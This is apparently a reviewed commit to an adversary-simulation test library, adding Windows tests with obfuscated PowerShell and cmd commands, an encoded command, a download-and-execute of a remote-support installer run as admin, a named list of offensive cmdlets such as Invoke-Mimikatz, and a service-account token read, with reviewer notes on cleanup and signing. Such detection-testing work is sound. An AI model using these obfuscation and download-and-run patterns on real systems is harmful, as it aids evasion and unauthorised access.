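Review bot: `GoToAssist Files Detected Test on Windows` downloads an installer from the internet and runs it with `elevation_required: true` via `Start-Process $file1 /S` without checking a hash or Authenticode signature, so whatever that URL serves runs as admin; the URL also embeds a long opaque `token=` query value that looks like a per-launch session token and may both stop working and identify the contributor's account. Gate execution with `if ((Get-AuthenticodeSignature $file1).Status -ne 'Valid') { throw 'GoToAssist installer is not validly signed' }` before `Start-Process`, and build the path from `$env:USERPROFILE` rather than `C:\Users\$env:username` so redirected profiles work. The `cleanup_command` points at `T1219/Bin/GoToCleanup.ps1`, which is not in this view, and wrapping it in `try{...} catch{}` hides any cleanup failure; at minimum write the caught error so a leftover elevated installer is noticed.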
@@ -266,4 +268,32 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +
+
+ +## Atomic Test #7 - Obfuscated Command in PowerShell +This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) +``` + + + + + +
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index 30e260ab..81f4b5c5 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list 
@@ -25,8 +24,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -40,4 +38,4 @@ atomic_tests: cleanup_command: | kubectl delete cronjob art -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..f780b418 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,10 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) + +- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets) +
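Review bot: The `supported_platforms` change from `linux`/`macos` to `containers` in both T1053.007 tests is not reflected anywhere else in this commit: the regenerated `index.csv`, `index.md` and `index.yaml` hunks touch only the new Windows tests, so the Indexes presumably still carry the old platform list for these two tests and no containers index is produced. Unless index regeneration is planned as a follow-up, rerun the generator in this change so the platform field stays consistent, and confirm the `bash` executor is what the other `containers` tests in the repo use.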
@@ -768,4 +772,74 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + + +
+
+ +## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets +Powershell execution of known Malicious PowerShell Cmdlets + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 49eb9404-5e0f-4031-a179-b40f7be385e3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| Malicious_cmdlets | Known Malicious Cmdlets | String | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$malcmdlets = #{Malicious_cmdlets} +foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} +foreach ($cmdlets in $malcmdlets) { + $cmdlets} +``` + + + + + +
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..15509f08 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml 
@@ -374,4 +374,41 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + +- name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt + +- name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: | + "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", 
"Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" + executor: + name: powershell + elevation_required: true + command: | + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} \ No newline at end of file diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
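Review bot: The `Suspicious Execution via Windows Command Shell` test writes `#{output_file}` into the working directory but, unlike the preceding test in this file whose cleanup is `del "#{file_contents_path}"`, declares no `cleanup_command`, so `hello.txt` is left behind after every run. Add `cleanup_command: del "#{output_file}"` to the executor. The `%LOCALAPPDATA:~-3,1%md` prefix also relies on `LOCALAPPDATA` ending in `\Local` to yield `cmd`; a sentence in the description stating that assumption would make a failure on a redirected profile understandable.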
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 8682f1e1..fe099523 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -30,6 +30,8 @@ Mshta.exe can be used to bypass application control solutions that do not accoun - [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path) +- [Atomic Test #10 - Mshta used to Execute PowerShell](#atomic-test-10---mshta-used-to-execute-powershell) +
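Review bot: The `File Download via PowerShell` test leaves `#{output_file}` on disk and, unlike the whois test directly above it (`rm -f #{output_file}`), has no `cleanup_command`; add `cleanup_command: Remove-Item #{output_file} -ErrorAction Ignore`. `Invoke-Item #{output_file}` also hands the file to the default associated application, which opens an interactive window the test never closes, so unattended or repeated runs will accumulate open editors; if that step is deliberate it should be called out in the description so operators expect it.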
@@ -423,4 +425,38 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #10 - Mshta used to Execute PowerShell +Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8707a805-2b76-4f32-b1c0-14e558205772 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| message | Encoded message to include | string | Hello,%20MSHTA!| +| seconds_to_sleep | How many seconds to sleep/wait | string | 5| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +mshta.exe "about:'" +``` + + + + + +
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 84790d0a..c6bb81eb 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -214,4 +214,24 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' - name: powershell \ No newline at end of file + name: powershell + +- name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: | + Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: | + mshta.exe "about:'" + name: command_prompt diff --git a/atomics/T1219/Bin/GoToCleanup.ps1 b/atomics/T1219/Bin/GoToCleanup.ps1 new file mode 100644 index 00000000..f4ae96de --- /dev/null +++ b/atomics/T1219/Bin/GoToCleanup.ps1 
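Review bot: The `Mshta used to Execute PowerShell` test declares `message` and `seconds_to_sleep` as input arguments but its command `mshta.exe "about:'"` references neither, and the command ends in an unclosed single quote, which suggests the HTA body that was meant to consume `#{message}` and `#{seconds_to_sleep}` was lost before commit (the regenerated T1218.005.md in this change shows the same truncated line). As written the test opens an empty `about:` page, so the description "Use Mshta to execute arbitrary PowerShell" does not match what executes. Either restore the intended command so both inputs are used, or remove the unused inputs and correct the description.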
@@ -0,0 +1,14 @@ +# GoTo Opener - delete registry install key because it can't be called by the system +$InstalledApp = "GoTo Opener" +$Keys = Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall -ErrorAction SilentlyContinue +$Items = $Keys | Get-ItemProperty | where-object {$_.DisplayName -eq $InstalledApp} +If ($Items) { + $KeyToDelete = $Items.PSPath + Remove-Item $KeyToDelete -Recurse -Force -ErrorAction SilentlyContinue +} +# GoTo Opener - delete user directories +Get-ChildItem "C:\Users\*\AppData" "GoTo Opener" -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { + $Directory = $_.ToString() + Remove-Item $Directory -Recurse -Force -ErrorAction SilentlyContinue + } +Start-Process -FilePath "C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe" -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 58c028d8..a80908e0 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit - [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows) +- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows) +
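Review bot: The final `Start-Process` hard-codes the uninstaller at `C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe`, pinning the cleanup to build `1702` and a 32-bit install location, and unlike every other step in this script it has no `-ErrorAction` handling, so on any other build the script fails after the Uninstall registry key has already been removed on the lines above. Guard the call with `Test-Path` and warn when the uninstaller is absent so the operator knows manual removal is needed; the `$Items` lookup earlier in the script reads the Uninstall key, which typically carries an `UninstallString` value, and that path could be captured before the key is deleted rather than assumed.
```powershell
# … unchanged: registry key and user-directory removal …
$Uninstaller = "C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe"
if (Test-Path -LiteralPath $Uninstaller) {
    Start-Process -FilePath $Uninstaller -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null
} else {
    Write-Warning "GoToAssist uninstaller not found at '$Uninstaller'; remove the product manually"
}
```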
@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore +
+
+ +## Atomic Test #4 - GoToAssist Files Detected Test on Windows +An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" +$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" +Start-Process $file1 /S; +``` + +#### Cleanup Commands: +```powershell +try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} +``` + + + + +
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 3231d454..701645f1 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -55,3 +55,18 @@ atomic_tests: name: powershell elevation_required: true +- name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: | + An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: + try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index c52c1078..34c4d88c 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml 
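Review bot: The `cleanup_command` `try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}` does not appear to run the script: a statement beginning with `$PathToAtomicsFolder` is parsed in expression mode, where `/` is the division operator, so the line is an error that the empty `catch{}` then hides and the GoToAssist install is left in place. Invoke the file explicitly, `& "$PathToAtomicsFolder\T1219\Bin\GoToCleanup.ps1"`, and drop the bare `catch` so a failed cleanup is visible. The download URL also embeds a launcher `token=` value that is likely single-use or time-limited, so the test is unlikely to stay reproducible; saying so in the description, or exposing the URL as an input argument, would make that explicit. The description's `sucessfully` is a typo for `successfully`.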
@@ -6,8 +6,7 @@ atomic_tests: description: | A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -22,7 +21,7 @@ atomic_tests: elevation_required: false - name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f description: | Access the Kubernetes service account access token stored within a container in a cluster. @@ -76,4 +75,4 @@ atomic_tests: kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token name: sh cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod \ No newline at end of file + kubectl --context kind-atomic-cluster delete pod atomic-pod diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml index 30303151..603506ab 100644 --- a/atomics/T1609/T1609.yaml +++ b/atomics/T1609/T1609.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use 
@@ -26,4 +25,4 @@ atomic_tests: cleanup_command: | kubectl delete pod busybox -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..53d1ea44 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,10 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 +8b3f4ed6-077b-4bdd-891c-2d237f19410f +49eb9404-5e0f-4031-a179-b40f7be385e3 +1b72b3bd-72f8-4b63-a30b-84e91b9c3578 +8707a805-2b76-4f32-b1c0-14e558205772